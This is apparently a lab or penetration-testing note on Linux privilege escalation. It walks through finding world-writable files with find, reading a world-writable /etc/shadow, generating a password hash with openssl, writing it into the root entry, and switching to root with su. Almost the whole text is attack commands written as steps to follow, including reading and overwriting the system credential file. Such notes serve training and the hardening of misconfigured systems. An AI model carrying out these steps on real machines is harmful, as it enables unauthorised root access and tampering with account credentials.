Misconfigured Permissions Files

Some files permissions are not set properly, use them to elevate privileges.

Local Enumeration

Misconfigured Permissions Files

• Look for world writable files

  • Find a file that could help to elevate privileges

find / -not -type l -perm -o+w

❗ /etc/shadow is writable by everyone!

ls -l /etc/shadow
cat /etc/shadow

# "root" user doesn't have a password specified

Privilege Escalation

• /etc/shadow stores the passwords in an encrypted format, so the root password need to be replaced with a hashed password

# Generate a password entry
openssl passwd -1 -salt abc password123
	$1$abc$UWUoROXzUCsLsVzI0R2et.

# Edit and paste the hashed password into the /etc/shadow file
vim /etc/shadow

• Switch to the root user

su
# type "password123" password for "root" user